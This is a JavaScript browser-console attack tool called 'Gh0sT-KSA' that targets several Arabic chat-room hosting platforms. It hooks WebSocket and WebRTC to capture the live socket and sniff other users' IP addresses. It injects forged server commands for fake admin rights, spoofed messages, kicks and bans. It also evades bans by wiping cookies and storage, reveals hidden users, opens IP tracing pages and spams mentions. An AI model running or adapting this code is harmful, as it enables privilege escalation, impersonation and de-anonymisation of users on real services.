console.log("Gh0sT-KSA V13.0 Ultimate | الترسانة الشاملة (Multi-Host + Smart Menu + Sniffer + Auto-Injector)");

(function() {
    var isMobile = /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);
    if (window.ghostKsaActive) window.ghostObserver && window.ghostObserver.disconnect();
    window.ghostKsaActive = true;
    window.alertedGhosts = new Set();
    window.sniffedIPs = {}; 
    window.globalWS = null; 

    // =========================================================================
    // 1) اعتراض الـ WebSocket لغرض الحقن (Injector)
    // =========================================================================
    const origSend = window.WebSocket.prototype.send;
    window.WebSocket.prototype.send = function(data) {
        window.globalWS = this; 
        return origSend.apply(this, arguments);
    };

    // =========================================================================
    // 2) جالب الآي بي الصامت (WebRTC IP Sniffer)
    // =========================================================================
    const origRTC = window.RTCPeerConnection;
    window.RTCPeerConnection = function(...args) {
        const pc = new origRTC(...args);
        pc.addEventListener('icecandidate', (e) => {
            if (e.candidate && e.candidate.candidate) {
                const ipRegex = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/;
                const match = e.candidate.candidate.match(ipRegex);
                if (match && !match[1].endsWith('.local')) {
                    console.log("📡 [Gh0sT Sniffer]: تم التقاط IP ->", match[1]);
                    window.sniffedIPs['latest'] = match[1];
                }
            }
        });
        return pc;
    };

    // =========================================================================
    // 3) مكافح الباند (Anti-Ban Engine) + تجاوز بصمة الجهاز
    // =========================================================================
    window.antiBanRescue = function() {
        localStorage.clear(); sessionStorage.clear();
        document.cookie.split(";").forEach(c => { document.cookie = c.replace(/^ +/, "").replace(/=.*/, "=;expires=" + new Date().toUTCString() + ";path=/"); });
        if(window.ClientJS) console.log("🛡️ تم اكتشاف نظام بصمة تايجر هوست، يفضل تغيير الـ IP مع التنظيف.");
        alert("🛡️ Gh0sT Anti-Ban: تم مسح الكوكيز والتخزين بالكامل لتجاوز الباند.\nقم بتحديث الصفحة أو تغيير الـ IP للدخول مجدداً!");
    };
    if(typeof window.kick === 'function') { window.originalKick = window.kick; window.kick = window.kicked = function() { console.log("🛡️ تم صد أمر الطرد محلياً!"); }; }

    // =========================================================================
    // 4) منع إعادة الإخفاء (Monkey Patching)
    // =========================================================================
    const originalAdd = DOMTokenList.prototype.add;
    DOMTokenList.prototype.add = function(...args) {
        if (args.includes('__rv_me') || args.includes('me') || args.includes('is-hidden') || args.includes('hide-user')) {
            if (this.contains('uzr') || this.contains('user-item') || this.contains('tiger-user') || this.contains('ph-user')) return; 
        }
        return originalAdd.apply(this, args);
    };

    // =========================================================================
    // 5) وحدة الاستشعار الذكي (Environment Detection Engine)
    // =========================================================================
    const CommonLegacyActions = {
        openProfile: (id, enc) => { if(typeof upro === 'function') { upro(enc || id); return true; } return false; },
        privateMsg: (id) => { if(typeof upm === 'function') { upm(id); return true; } else if(typeof window.openw === 'function') { window.openw(id, true); return true; } return false; },
        notify: (id) => { if(typeof unot === 'function') { unot(id); return true; } return false; },
        historyNicks: (id) => { if(typeof uh === 'function') { uh(id); return true; } return false; },
        roomKick: (id) => { if(typeof urkick === 'function') { urkick(id); return true; } return false; },
        serverKick: (id) => { if(typeof ukick === 'function') { ukick(id); return true; } return false; },
        ban: (id) => { if(typeof uban === 'function') { uban(id); return true; } return false; }
    };

    const HostEngines = {
        JawwalHost: { name: "جوال هوست (Jawwal Host)", detect: () => (typeof upro === 'function' || typeof _m56zznz2 !== 'undefined') && document.querySelector('.uzr') !== null && document.querySelector('.ph-user') === null, selectors: { userList: '#users .uzr', pic: '.u-pic', searchBox: '#usearch' }, actions: CommonLegacyActions },
        PhoneHost: { name: "فون هوست (Phone Host)", detect: () => document.querySelector('.ph-user') !== null || (typeof upro === 'function' && document.querySelector('.uzr') === null && document.querySelector('.ph-user') !== null), selectors: { userList: '.ph-user, .uzr', pic: '.ph-img, .u-pic', searchBox: '#ph-search, #usearch' }, actions: CommonLegacyActions },
        UCamHost: { name: "يو كام هوست (UCam Host)", detect: () => typeof window.MSDevice !== 'undefined' || document.querySelector('.ucam-chat-class, .user-item') !== null, selectors: { userList: '.user-item', pic: 'img.avatar', searchBox: '#search-users' }, actions: { openProfile: false, privateMsg: false, notify: false, historyNicks: false, roomKick: false, serverKick: false, ban: false } },
        TigerHost: { name: "تايقر هوست (Tiger Host)", detect: () => typeof TigerChat !== 'undefined' || document.querySelector('.tiger-user') !== null || typeof window.io !== 'undefined', selectors: { userList: '.tiger-user', pic: '.t-pic', searchBox: '#t-search' }, actions: { openProfile: false, privateMsg: false, notify: false, historyNicks: false, roomKick: false, serverKick: false, ban: false } }
    };

    let CurrentEnv = null;
    for (let key in HostEngines) { if (HostEngines[key].detect()) { CurrentEnv = HostEngines[key]; break; } }
    if (!CurrentEnv) { CurrentEnv = HostEngines.JawwalHost; }

    // =========================================================================
    // 6) جرد القدرات والتنبيهات المخصصة للنسخ المعقدة
    // =========================================================================
    setTimeout(() => {
        let isUCam = CurrentEnv.name.includes("UCam");
        let isTiger = CurrentEnv.name.includes("Tiger");

        if (isUCam) {
            alert(`⚠️ تنبيه نظام: ${CurrentEnv.name} ⚠️\n\n- الاتصال: يعتمد على Webpack و Mediasoup.\n- التوافق: الأوامر المباشرة ستفشل ❌.\n- طريقة التخطي (الحل): استخدم "القائمة الذكية". عند النقر على الأوامر غير المدعومة، سيقوم السكريبت تلقائياً بتجهيز حزمة JSON وإرسالها عبر "محقن السيرفر" بالنيابة عنك.\n- صائد الـ IP: قد يجلب آي بي السيرفر الوسيط.`);
        } else if (isTiger) {
            alert(`⚠️ تنبيه نظام: ${CurrentEnv.name} ⚠️\n\n- الاتصال: محمي بـ Cloudflare وبصمة ClientJS و Socket.IO.\n- طريقة التخطي (الحل): محقن السيرفر في القائمة الذكية سيقوم بإضافة الرقم (42) تلقائياً لتخطي حماية Engine.IO.\n- لتجاوز الباند النهائي: استخدم أداة "مكافح الباند" لمسح الـ LocalStorage، ويفضل تغيير الـ IP وتزييف الـ User-Agent.`);
        } else {
            let capMsg = `🤖 تقرير محرك Gh0sT-KSA V13.0\nالاستضافة: ${CurrentEnv.name}\n✅ كشف المخفيين ✅ منع الإخفاء ✅ صائد الـ IP ✅ مكافح الباند\n\nجميع الأوامر مدعومة محلياً في هذه النسخة.`;
            alert(capMsg);
        }
    }, 1000);

    // =========================================================================
    // 7) التصميم المتقدم والمتوافق مع جميع الأجهزة
    // =========================================================================
    var styles = document.createElement('style');
    styles.innerHTML = `
        .ghost-revealed { border: 2px solid #3498db !important; background-color: rgba(52, 152, 219, 0.15) !important; border-radius: 5px; margin: 2px 0; }
        .uzr, .user-item, .tiger-user, .ph-user { border-right: none !important; border-left: none !important; cursor: pointer !important; } 
        .ghost-smart-menu { position: fixed; background: rgba(15, 20, 25, 0.98); color: #fff; padding: 10px; border-radius: 12px; box-shadow: 0 10px 30px rgba(0,0,0,0.9); z-index: 9999999; display: flex; flex-direction: column; gap: 6px; min-width: 250px; font-family: 'Segoe UI', Tahoma, sans-serif; font-size: 13px; direction: rtl; border: 1px solid #3498db; backdrop-filter: blur(5px); overflow-y: auto; max-height: 85vh; }
        .ghost-menu-item { padding: 8px 12px; cursor: pointer; border-radius: 6px; text-align: right; transition: all 0.2s ease; border-bottom: 1px solid #2c3e50; display: flex; justify-content: space-between; align-items: center; }
        .ghost-menu-item:hover { background: #34495e; color: #3498db; padding-right: 18px; }
        .ghost-menu-item:last-child { border-bottom: none; }
        .ghost-menu-header { color: #f1c40f; text-align: center; font-weight: bold; padding-bottom: 5px; border-bottom: 2px dashed #3498db; margin-bottom: 5px; }
        .ghost-menu-close { background: #e74c3c; color: white; border-radius: 6px; text-align: center; padding: 8px; cursor: pointer; margin-top: 5px; font-weight: bold; }
        .status-icon { font-size: 11px; font-weight: bold;}
        #ghost-radar-container { position: fixed; top: 20px; right: 20px; z-index: 9999999; display: flex; flex-direction: column; gap: 12px; pointer-events: none; }
        .ghost-toast { background: linear-gradient(135deg, rgba(26, 37, 47, 0.95), rgba(44, 62, 80, 0.95)); border-right: 5px solid #3498db; border-radius: 10px; padding: 12px; width: 280px; color: white; font-family: Tahoma; direction: rtl; box-shadow: 0 8px 20px rgba(0,0,0,0.6); animation: slideInRight 0.5s cubic-bezier(0.25, 0.8, 0.25, 1); pointer-events: auto; display: flex; align-items: center; gap: 10px; }
        .ghost-toast img { width: 40px; height: 40px; border-radius: 50%; border: 2px solid #3498db; }
        .ghost-toast-content { flex: 1; }
        .ghost-toast-title { font-weight: bold; color: #3498db; font-size: 13px; margin-bottom: 3px; }
        .ghost-toast-info { font-size: 11px; color: #bdc3c7; } .ghost-toast-info span { color: #f1c40f; font-weight: bold; }
        #ghost-counter-hud { position: fixed; top: 10px; left: 50%; transform: translateX(-50%); background: rgba(15,20,25,0.9); border: 1px solid #3498db; border-radius: 20px; padding: 5px 15px; color: #fff; font-family: Tahoma; font-size: 12px; font-weight: bold; display: flex; gap: 15px; z-index: 999999; box-shadow: 0 4px 10px rgba(0,0,0,0.5); pointer-events: none; }
        .gc-real { color: #2ecc71; } .gc-fake { color: #e74c3c; }
        @media (max-width: 600px) { #ghost-radar-container { top: 50px; right: 50%; transform: translateX(50%); width: 90%; } .ghost-toast { width: 100%; } #ghost-counter-hud { top: auto; bottom: 60px; } }
        @keyframes slideInRight { from { transform: translateX(100%); opacity: 0; } to { transform: translateX(0); opacity: 1; } }
    `;
    document.head.appendChild(styles);
    document.addEventListener('click', e => { if (!e.target.closest('.ghost-smart-menu')) document.querySelectorAll('.ghost-smart-menu').forEach(m => m.remove()); });

    // =========================================================================
    // 8) تنظيف الواجهة وإجبار الظهور (مع إلغاء الفتح الإجباري للخاص)
    // =========================================================================
    function cleanAndReveal() {
        document.querySelectorAll('[class*="itarr_"], .ahmed, .mhmood, .bg-img').forEach(el => { 
            if(!el.classList.contains('uzr') && !el.classList.contains('user-item') && !el.classList.contains('ph-user') && !el.classList.contains('tiger-user')) el.remove(); 
        });
        document.querySelectorAll(CurrentEnv.selectors.userList).forEach(el => {
            // إزالة الأحداث الأصلية لمنع فتح الخاص تلقائياً عند النقر على الصور المخفية
            el.removeAttribute('onclick');
            var picElement = el.querySelector(CurrentEnv.selectors.pic);
            if(picElement) picElement.removeAttribute('onclick');

            var isHiddenStyle = el.style.maxHeight === '0px' || el.style.display === 'none' || el.style.opacity === '0';
            var hasS4 = el.querySelector('img.ustat[src*="s4.png"]');
            var hasHiddenClass = el.classList.contains('__rv_me') || el.classList.contains('me') || el.classList.contains('is-hidden');

            if (isHiddenStyle || hasS4 || hasHiddenClass) {
                el.classList.add('ghost-revealed');
                el.style.setProperty('display', 'block', 'important');
                el.style.setProperty('max-height', 'none', 'important');
                el.style.setProperty('opacity', '1', 'important');
                el.classList.remove('__rv_me', 'me', 'is-hidden');
                el.querySelectorAll('[style*="display: none"]').forEach(inner => inner.style.setProperty('display', 'block', 'important'));
                var ustat = el.querySelector("img.ustat, img[src*='s0.png']");
                if (ustat && !ustat.src.includes('s4.png')) ustat.src = 'imgs/s4.png';
            }
        });
    }

    // =========================================================================
    // 9) نظام كشف المتواجدون (حقيقي vs وهمي)
    // =========================================================================
    function updateCounter() {
        var realDOMCount = document.querySelectorAll(CurrentEnv.selectors.userList).length;
        var displayEl = document.querySelector('.lonline, #users_count, .tc span, .online-count'); 
        var displayCount = displayEl ? parseInt(displayEl.innerText.replace(/\D/g, '')) || realDOMCount : realDOMCount;
        var fakeCount = Math.max(0, displayCount - realDOMCount);

        var counterDiv = document.getElementById("ghost-counter-hud");
        if (!counterDiv) {
            counterDiv = document.createElement("div");
            counterDiv.id = "ghost-counter-hud";
            document.body.appendChild(counterDiv);
        }
        counterDiv.innerHTML = `<span class="gc-real">🟢 حقيقي: ${realDOMCount}</span> <span class="gc-fake">🔴 وهمي: ${fakeCount}</span>`;
    }

    // =========================================================================
    // 10) حاوية التنبيهات (Toast Notifications) للمخفيين
    // =========================================================================
    if (!document.getElementById("ghost-radar-container")) {
        var container = document.createElement("div"); container.id = "ghost-radar-container"; document.body.appendChild(container);
    }
    function checkHiddenUsers() {
        var currentGhostsInDom = new Set();
        document.querySelectorAll(CurrentEnv.selectors.userList).forEach(userEl => {
            if(!userEl.querySelector(CurrentEnv.selectors.pic)) return;
            if (userEl.classList.contains('ghost-revealed') || (userEl.querySelector('img.ustat') && userEl.querySelector('img.ustat').src.includes('s4.png'))) {
                var uidClass = Array.from(userEl.classList).find(c => c.startsWith('uid') || c.startsWith('user-id'));
                if (uidClass) currentGhostsInDom.add(uidClass);
            }
        });
        window.alertedGhosts.forEach(id => { if (!currentGhostsInDom.has(id)) window.alertedGhosts.delete(id); });

        document.querySelectorAll(CurrentEnv.selectors.userList).forEach(userEl => {
            if(!userEl.querySelector(CurrentEnv.selectors.pic)) return;
            if (userEl.classList.contains('ghost-revealed') || (userEl.querySelector('img.ustat') && userEl.querySelector('img.ustat').src.includes('s4.png'))) {
                var uidClass = Array.from(userEl.classList).find(c => c.startsWith('uid') || c.startsWith('user-id'));
                var userId = uidClass ? uidClass.replace(/uid|user-id-/, '') : "مخفي";
                
                if (userId !== "مخفي" && !window.alertedGhosts.has(uidClass)) {
                    window.alertedGhosts.add(uidClass); 
                    var name = userEl.getAttribute("n") || userEl.innerText.split('\n')[0].trim() || "غير معروف";
                    var pic = userEl.querySelector(CurrentEnv.selectors.pic);
                    var picSrc = "pic/unknown.png";
                    if(pic) {
                        if(pic.tagName === 'IMG') picSrc = pic.src;
                        else picSrc = (pic.style.backgroundImage.match(/url\(["']?(.*?)["']?\)/) || [])[1] || "pic/unknown.png";
                    }
                    var toast = document.createElement("div");
                    toast.className = "ghost-toast";
                    toast.onclick = () => toast.remove(); 
                    toast.innerHTML = `
                        <img src="${picSrc}" onerror="this.src='pic/unknown.png'">
                        <div class="ghost-toast-content">
                            <div class="ghost-toast-title">🚨 رادار المخفيين</div>
                            <div class="ghost-toast-info">الاسم: <span>${name}</span></div>
                            <div class="ghost-toast-info">المعرف: <span>${userId}</span></div>
                        </div>
                    `;
                    document.getElementById("ghost-radar-container").appendChild(toast);
                    setTimeout(() => toast.remove(), 8000); 
                }
            }
        });
    }

    // =========================================================================
    // 11) القائمة الذكية الشاملة + المحقن الآلي للنسخ المعقدة (Auto-Injector)
    // =========================================================================
    function enableSmartMenu() {
        document.querySelectorAll(CurrentEnv.selectors.userList).forEach(user => {
            if (!user._menuBound) {
                // إجبار القائمة الذكية على الظهور لأي مستخدم عند النقر
                const handler = function(e) { e.stopImmediatePropagation(); e.preventDefault(); showMenu(e, user); };
                user.addEventListener("click", handler, true);
                user.addEventListener("contextmenu", handler, true);
                user._menuBound = true;
            }
        });
    }

    function showMenu(e, user) {
        document.querySelectorAll('.ghost-smart-menu').forEach(m => m.remove());
        var picEl = user.querySelector(CurrentEnv.selectors.pic);
        var uidClass = Array.from(user.classList).find(c => c.startsWith("uid") || c.startsWith("user-id-"));
        var userId = uidClass ? uidClass.replace(/uid|user-id-/, '') : "غير معروف";
        var userName = user.getAttribute("n") || user.innerText.split('\n')[0].trim() || "بدون اسم";
        var userIp = user.getAttribute("i") || user.getAttribute("ip") || "محمي بالسيرفر";
        var devInfo = user.getAttribute("d") || user.getAttribute("dev") || "معلومات غير متوفرة";
        var encryptedId = "غير متوفر"; var picUrl = "pic/unknown.png";
        
        if (picEl) {
            var onclickStr = picEl.getAttribute('onclick') || user.getAttribute('onclick') || "";
            var match = onclickStr.match(/upro\(['"]([^'"]+)['"]\)/);
            if (match && match[1]) encryptedId = match[1];
            
            if(picEl.tagName === 'IMG') picUrl = picEl.src;
            else {
                var bg = picEl.style.backgroundImage || window.getComputedStyle(picEl).backgroundImage;
                var matchPic = bg.match(/url\(["']?(.*?)["']?\)/);
                if (matchPic && matchPic[1]) picUrl = matchPic[1].startsWith('http') ? matchPic[1] : window.location.origin + '/' + matchPic[1].replace(/^\/+/, '');
            }
        }

        var menu = document.createElement('div');
        menu.className = 'ghost-smart-menu';
        if (isMobile || window.innerWidth < 600) {
            menu.style.left = '50%'; menu.style.top = '50%'; menu.style.transform = 'translate(-50%, -50%)';
        } else {
            menu.style.left = Math.min(e.pageX + 10, window.innerWidth - 260) + 'px'; 
            menu.style.top = Math.min(e.pageY, window.innerHeight - 600) + 'px';
        }

        const acts = CurrentEnv.actions;
        const s = (supp) => supp ? `<span class="status-icon">✅</span>` : `<span class="status-icon">❌</span>`;

        menu.innerHTML = `
            <div class="ghost-menu-header">💀 Gh0sT Control 💀</div>
            <div class="ghost-menu-item" id="btn-profile"><span>👤 فتح البروفايل</span> ${s(acts.openProfile)}</div>
            <div class="ghost-menu-item" id="btn-private"><span>💬 رسالة خاصة</span> ${s(acts.privateMsg)}</div>
            <div class="ghost-menu-item" id="btn-notify"><span>🔔 إرسال تنبيه</span> ${s(acts.notify)}</div>
            <div class="ghost-menu-item" id="btn-copy-name"><span>📝 نسخ الاسم</span> ${s(true)}</div>
            <div class="ghost-menu-item" id="btn-save-pic"><span>🖼️ حفظ الصورة</span> ${s(true)}</div>
            <div class="ghost-menu-item" id="btn-clone"><span>🎭 استنساخ البروفايل</span> ${s(true)}</div>
            <div class="ghost-menu-item" id="btn-id-actions"><span>🔑 نسخ وبحث المعرف</span> ${s(true)}</div>
            <div class="ghost-menu-item" id="btn-ip-actions"><span>🌍 نسخ/بحث وتتبع الآي بي</span> ${s(true)}</div>
            <div class="ghost-menu-item" id="btn-dev-actions"><span>📱 نسخ/بحث معلومات الجهاز</span> ${s(true)}</div>
            <div class="ghost-menu-item" id="btn-spam"><span>🔥 منشن مزعج</span> ${s(true)}</div>
            <div class="ghost-menu-item" id="btn-nicks"><span>🕵️ كشف النكات</span> ${s(acts.historyNicks)}</div>
            <div class="ghost-menu-item" id="btn-roomkick"><span>🚪 طرد من الغرفة</span> ${s(acts.roomKick)}</div>
            <div class="ghost-menu-item" id="btn-serverkick"><span>⛔ طرد نهائي</span> ${s(acts.serverKick)}</div>
            <div class="ghost-menu-item" id="btn-ban"><span>🚫 باند حظر</span> ${s(acts.ban)}</div>
            <div class="ghost-menu-header" style="margin-top:5px; padding-top:5px;">🛠️ أدوات الشبح المتقدمة 🛠️</div>
            <div class="ghost-menu-item" id="btn-sniffer"><span>🎧 صائد الآي بي (يعمل عبر المايك)</span> <span class="status-icon">🎤</span></div>
            <div class="ghost-menu-item" id="btn-injector"><span>💉 محقن السيرفر (Injector)</span> <span class="status-icon">⚙️</span></div>
            <div class="ghost-menu-item" id="btn-antiban"><span>🛡️ مكافح الباند (تنظيف وتخطي)</span> ${s(true)}</div>
            <div class="ghost-menu-close">إغلاق القائمة ❌</div>
        `;
        document.body.appendChild(menu);

        // المحقن الآلي: إذا كانت الدالة غير مدعومة (مثل تايجر ويوكام)، يقترح السكريبت حقن الأمر عبر السيرفر
        const execSmart = (func, cmdJson, ...args) => { 
            if(func) {
                func(...args); 
            } else {
                let isTiger = CurrentEnv.name.includes("Tiger");
                let payload = isTiger ? `42["message",{"cmd":"${cmdJson}","id":"${userId}"}]` : `{"cmd":"${cmdJson}","id":"${userId}"}`;
                
                if (window.globalWS && window.globalWS.readyState === 1) {
                    if (confirm(`❌ الزر المباشر مغلق في هذه النسخة.\nهل تريد أن يقوم Gh0sT بحقن الأمر للسيرفر برمجياً بالنيابة عنك؟\n\nالكود المرسل: ${payload}`)) {
                        window.globalWS.send(payload);
                        alert("✅ تم إرسال أمر الحقن بنجاح للسيرفر!");
                    }
                } else {
                    alert("❌ فشل حقن السيرفر. قم بإرسال أي كلمة في الدردشة العامة أولاً لالتقاط اتصال الـ Socket ثم حاول مجدداً.");
                }
            }
            menu.remove(); 
        };

        document.getElementById('btn-profile').onclick = () => execSmart(acts.openProfile, "cp", userId, encryptedId);
        document.getElementById('btn-private').onclick = () => execSmart(acts.privateMsg, "msg", userId);
        document.getElementById('btn-notify').onclick = () => execSmart(acts.notify, "not", userId);
        document.getElementById('btn-nicks').onclick = () => execSmart(acts.historyNicks, "uh", userId);
        document.getElementById('btn-roomkick').onclick = () => { if(confirm(`طرد ${userName} من الغرفة؟`)) execSmart(acts.roomKick, "kick", userId); };
        document.getElementById('btn-serverkick').onclick = () => { if(confirm(`طرد ${userName} نهائياً؟`)) execSmart(acts.serverKick, "kick", userId); }; // قد يختلف امر الطرد النهائي حسب السيرفر
        document.getElementById('btn-ban').onclick = () => { if(confirm(`حظر ${userName}؟`)) execSmart(acts.ban, "ban", userId); };
        
        document.getElementById('btn-copy-name').onclick = () => { prompt("الاسم:", userName); menu.remove(); };
        document.getElementById('btn-save-pic').onclick = () => { window.open(picUrl, '_blank'); menu.remove(); };
        document.getElementById('btn-clone').onclick = () => { prompt("🎭 استنساخ:", userName); alert("رابط الصورة للاستنساخ:\n" + picUrl); menu.remove(); };
        document.getElementById('btn-id-actions').onclick = () => { var tId = (encryptedId !== "غير متوفر") ? encryptedId : userId; prompt("المعرف (Hash/ID):", tId); var b = document.querySelector(CurrentEnv.selectors.searchBox); if (b) { b.value = tId; b.dispatchEvent(new Event('keyup')); } menu.remove(); };
        document.getElementById('btn-ip-actions').onclick = () => { if (userIp !== "محمي بالسيرفر") { prompt("الآي بي:", userIp); window.open("https://ipinfo.io/" + userIp, '_blank'); var b = document.querySelector(CurrentEnv.selectors.searchBox); if (b) { b.value = userIp; b.dispatchEvent(new Event('keyup')); } } else alert("محمي بالسيرفر. استخدم صائد الآي بي عند فتحه للمايك."); menu.remove(); };
        document.getElementById('btn-dev-actions').onclick = () => { prompt("معلومات الجهاز:", devInfo); var b = document.querySelector(CurrentEnv.selectors.searchBox); if (b && devInfo !== "معلومات غير متوفرة") { b.value = devInfo; b.dispatchEvent(new Event('keyup')); } menu.remove(); };
        document.getElementById('btn-spam').onclick = () => { var inp = document.querySelector('input[type="text"]') || document.querySelector('textarea'); if(inp) { inp.value += ` ﴾${userName}﴿ `; inp.focus(); } else prompt("انسخ المنشن:", ` ﴾${userName}﴿ `); menu.remove(); };

        // 🛠️ أدوات الشبح
        document.getElementById('btn-sniffer').onclick = () => {
            let captured = window.sniffedIPs['latest'] || "لم يتم التقاط شيء بعد.\nالتقاط الـ IP الصامت يعمل عندما يقوم الهدف بفتح المايك (الاتصال الصوتي).";
            prompt("📡 WebRTC IP Sniffer:\nالآي بي الملتقط:", captured);
            menu.remove();
        };

        document.getElementById('btn-injector').onclick = () => {
            if (!window.globalWS || window.globalWS.readyState !== 1) {
                alert("❌ فشل الاتصال! أرسل رسالة في العام أولاً لتهيئة اعتراض الـ Socket.");
            } else {
                let isTiger = CurrentEnv.name.includes("Tiger");
                let choice = prompt(`💉 Socket Injector - اختر الهجمة:\n1- ترقية نفسك (Fake Admin)\n2- إرسال رسالة باسم آخر (Spoofing)\n3- أمر مخصص (Custom JSON)${isTiger ? '\n\n⚠️ تايجر هوست: السكريبت سيضيف الرقم 42 تلقائياً.' : ''}`, "1");
                let payload = "";
                
                if (choice === "1") {
                    payload = isTiger ? `42["message",{"cmd":"cp","power":"admin","id":"${userId}"}]` : `{"cmd":"cp","power":"admin","id":"${userId}"}`;
                } else if (choice === "2") {
                    payload = isTiger ? `42["message",{"cmd":"msg","text":"تم الاختراق","id":"${userId}"}]` : `{"cmd":"msg","text":"تم الاختراق بواسطة Gh0sT-KSA","id":"${userId}"}`;
                } else if (choice === "3") {
                    payload = prompt("أدخل كود الـ JSON ليتم حقنه:", isTiger ? `42["message",{"cmd":"cp","id":"${userId}"}]` : `{"cmd":"cp","id":"${userId}"}`);
                }
                
                if (payload) {
                    try { window.globalWS.send(payload); alert("✅ تم حقن السيرفر بنجاح!"); } 
                    catch(e) { alert("❌ حدث خطأ أثناء إرسال البيانات للسيرفر."); }
                }
            }
            menu.remove();
        };

        document.getElementById('btn-antiban').onclick = () => {
            window.antiBanRescue();
            menu.remove();
        };

        menu.querySelector('.ghost-menu-close').onclick = () => menu.remove();
    }

    // =========================================================================
    // 12) المراقبة المستمرة للأحداث (MutationObserver)
    // =========================================================================
    var isProcessing = false;
    window.ghostObserver = new MutationObserver(() => {
        if (isProcessing) return; 
        var sBox = document.querySelector(CurrentEnv.selectors.searchBox);
        if (sBox && sBox.value.trim().length > 0) return; // توقف مؤقت أثناء البحث لتجنب التعليق
        
        isProcessing = true;
        cleanAndReveal(); checkHiddenUsers(); enableSmartMenu(); updateCounter();
        setTimeout(() => { isProcessing = false; }, 300);
    });
    window.ghostObserver.observe(document.body, { childList: true, subtree: true, attributes: true, attributeFilter: ['style', 'class'] });
    cleanAndReveal(); checkHiddenUsers(); enableSmartMenu(); updateCounter();

})();
